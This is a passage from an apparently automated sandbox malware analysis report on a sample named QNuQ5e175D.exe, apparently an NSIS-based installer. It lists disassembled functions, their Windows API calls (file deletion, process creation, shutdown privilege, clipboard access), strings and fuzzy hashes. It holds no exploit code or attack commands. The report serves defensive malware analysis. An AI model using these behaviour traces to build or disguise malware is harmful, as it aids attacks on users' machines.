                                                          • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E68
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E46
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3081826266
                                                          • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                          • Instruction ID: f2f0f64a112d89f35c11d852d44423d34ca235ab8761dbed5ccf1744ff487032
                                                          • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                          • Instruction Fuzzy Hash: C2D05E31101534AAC6116F54AD04DDB62AC9E46384381483BF541B20A5C778595186FD
                                                          Function 6FC410E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 6FC41171
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 6FC411E3
                                                          • GlobalFree.KERNEL32 ref: 6FC4124A
                                                          • GlobalFree.KERNEL32(?), ref: 6FC4129B
                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC412B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                          • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: e292c2721021a6005a6f5c1072a87d8e7d9e30d521bd9573e5a6c02c22b17590
                                                          • Instruction ID: 43dea09278065eeb2a0a021ec3cadefdeec0428521daef3c158bfc707b7ebf4f
                                                          • Opcode Fuzzy Hash: e292c2721021a6005a6f5c1072a87d8e7d9e30d521bd9573e5a6c02c22b17590
                                                          • Instruction Fuzzy Hash: 91516BB99007069FDB12EF6CD944A667BF8FB0A325B00451AEA84DB251F735E938CB50
                                                          Function 00402663 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll), ref: 004026BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp$C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll
                                                          • API String ID: 1659193697-2028166896
                                                          • Opcode ID: 16bcd07f8b696e8d4d77bdf42abac6a8be44450ddb0260aebc576801c6c870aa
                                                          • Instruction ID: 2d8dd356423beb748054ff885628a6ea3dfbd93006732d19d47d72bde2aed11d
                                                          • Opcode Fuzzy Hash: 16bcd07f8b696e8d4d77bdf42abac6a8be44450ddb0260aebc576801c6c870aa
                                                          • Instruction Fuzzy Hash: 3C11EB71A00315ABCB106FB19E466AE7761AF40748F21443FF502B71C1EAFD8891676E
                                                          Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                                          • GetTickCount.KERNEL32 ref: 0040306F
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                          • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: dba963b85b565a1be4b34eea4ba853e9dad76a83014f6dce089c5eda9641480c
                                                          • Instruction ID: e0f0fd039426b51c9db09d8e0aed7b7b9f53d87474512ec8403aba9b2c913b41
                                                          • Opcode Fuzzy Hash: dba963b85b565a1be4b34eea4ba853e9dad76a83014f6dce089c5eda9641480c
                                                          • Instruction Fuzzy Hash: 93F05470602A21ABC6216F50FE09A9B7B69FB45B12B41043AF545B11ACCB384891CB9D
                                                          Function 00405570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 0040559F
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004055F0
                                                            • Part of subcall function 00404542: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404554
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                          • Instruction ID: f144bc20a23b2fc1dad06cc698734642626ca736bc3518a3bbd7873959a32aa8
                                                          • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                          • Instruction Fuzzy Hash: 21017171100608BBDF219F11DD84A9F376BEB84794F204037FA027A1D9C7398D529A69
                                                          Function 00403BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B8C,00403AA2,?,?,00000008,0000000A,0000000C), ref: 00403BCE
                                                          • GlobalFree.KERNEL32(0065E8B8), ref: 00403BD5
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403BB4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-3081826266
                                                          • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                          • Instruction ID: 378dd3650374f781d23bf779db5809bbac3881e8a2166d277484928c36cee721
                                                          • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                          • Instruction Fuzzy Hash: 20E08C336204205BC6311F15AE05B1A77786F89B2AF01402AE8407B2628BB47C528FC8
                                                          Function 00405E92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QNuQ5e175D.exe,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 00405E98
                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QNuQ5e175D.exe,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 00405EA8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-224404859
                                                          • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                          • Instruction ID: f09b3c5ebc87e5286f4ae90cf2a9e4f9baad7a67d9a69d6c991adc66958b5f71
                                                          • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                          • Instruction Fuzzy Hash: 40D05EB28019209ED3226B04EC0499F73A8EF123107868826E980A61A5D7785D818AEC
                                                          Function 00405FCC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FF4
                                                          • CharNextA.USER32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406005
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                          • Instruction ID: b896d6fd3cda69cb85c158c7a33f171d68b8f81fed19edc6c2f6f75b2124ada4
                                                          • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                          • Instruction Fuzzy Hash: 64F0F631104418FFC702DFA5DD00D9EBBA8EF45350B2200B9E841FB250D674DE11AB68

                                                          Non-executed Functions

                                                          Function 00403552 Relevance: 72.2, APIs: 32, Strings: 9, Instructions: 464stringfilecomCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNEL32 ref: 00403575
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004035A0
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004035B3
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040364C
                                                          • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403689
                                                          • OleInitialize.OLE32(00000000), ref: 00403690
                                                          • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 004036AF
                                                          • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036C4
                                                          • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036FD
                                                          • GetTempPathW.KERNEL32(00000400,00441800,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403835
                                                          • GetWindowsDirectoryW.KERNEL32(00441800,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                          • lstrcatW.KERNEL32(00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403852
                                                          • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403866
                                                          • lstrcatW.KERNEL32(00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040386E
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387F
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00441800,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403887
                                                          • DeleteFileW.KERNEL32(00441000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040389B
                                                          • lstrlenW.KERNEL32(00441800,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403974
                                                            • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                          • wsprintfW.USER32 ref: 004039D1
                                                          • GetFileAttributesW.KERNEL32(00437800,00441800), ref: 00403A04
                                                          • DeleteFileW.KERNEL32(00437800), ref: 00403A10
                                                          • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 00403A3E
                                                            • Part of subcall function 00406337: MoveFileExW.KERNEL32(?,?,00000005,00405E35,?,00000000,000000F1,?,?,?,?,?), ref: 00406341
                                                          • CopyFileW.KERNEL32(00442800,00437800,00000001,00441800,00000000), ref: 00403A54
                                                            • Part of subcall function 00405B5A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                            • Part of subcall function 00405B5A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                            • Part of subcall function 004068D4: FindFirstFileW.KERNEL32(74DF3420,0042FAB8,0042F270,00405F97,0042F270,0042F270,00000000,0042F270,0042F270,74DF3420,?,00441800,00405CA3,?,74DF3420,00441800), ref: 004068DF
                                                            • Part of subcall function 004068D4: FindClose.KERNEL32(00000000), ref: 004068EB
                                                          • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AA2
                                                          • ExitProcess.KERNEL32 ref: 00403ABF
                                                          • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AC6
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AE2
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AE9
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AFE
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B21
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B46
                                                          • ExitProcess.KERNEL32 ref: 00403B69
                                                            • Part of subcall function 00405B25: CreateDirectoryW.KERNEL32(?,00000000,00403545,00441800,00441800,00441800,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 00405B2B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                          • String ID: Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                          • API String ID: 1813718867-2779336553
                                                          • Opcode ID: bbfb8ee3b373486c2b96c0f4544b3db19e0e60a46ad8d454647acdf6da7e114b
                                                          • Instruction ID: 854c728f01c0035939758d15b123b9002cb8995d15bf2fdbd915a0a46deb4321
                                                          • Opcode Fuzzy Hash: bbfb8ee3b373486c2b96c0f4544b3db19e0e60a46ad8d454647acdf6da7e114b
                                                          • Instruction Fuzzy Hash: 6DF1F470604301ABD320AF659D05B6B7EE8EB8570AF10483FF581B22D1DB7DDA458B6E
                                                          Function 00405C83 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNEL32(?,?,74DF3420,00441800,0043F000), ref: 00405CAC
                                                          • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405CF4
                                                          • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405D17
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405D1D
                                                          • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405D2D
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DCD
                                                          • FindClose.KERNEL32(00000000), ref: 00405DDC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: \*.*$pB
                                                          • API String ID: 2035342205-1006940126
                                                          • Opcode ID: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
                                                          • Instruction ID: 26a84cf893ecfac7fe2d2a8ab9ced37764d13583991ceadb599b2dfedf858990
                                                          • Opcode Fuzzy Hash: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
                                                          • Instruction Fuzzy Hash: 8E41B030800A18B6CB21AB65DC4DAAF7778EF42718F10813BF851711D1DB7C4A82DEAE
                                                          Function 0040573B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405799
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004057A8
                                                          • GetClientRect.USER32(?,?), ref: 004057E5
                                                          • GetSystemMetrics.USER32(00000002), ref: 004057EC
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040580D
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040581E
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405831
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040583F
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405852
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405874
                                                          • ShowWindow.USER32(?,00000008), ref: 00405888
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004058A9
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004058B9
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058D2
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058DE
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004057B7
                                                            • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004058FB
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000056CF,00000000), ref: 00405909
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405910
                                                          • ShowWindow.USER32(00000000), ref: 00405934
                                                          • ShowWindow.USER32(?,00000008), ref: 00405939
                                                          • ShowWindow.USER32(00000008), ref: 00405983
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004059B7
                                                          • CreatePopupMenu.USER32 ref: 004059C8
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059DC
                                                          • GetWindowRect.USER32(?,?), ref: 004059FC
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405A15
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A4D
                                                          • OpenClipboard.USER32(00000000), ref: 00405A5D
                                                          • EmptyClipboard.USER32 ref: 00405A63
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A6F
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405A79
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A8D
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405AAD
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405AB8
                                                          • CloseClipboard.USER32 ref: 00405ABE
                                                          Strings
                                                          Memory Dump Source
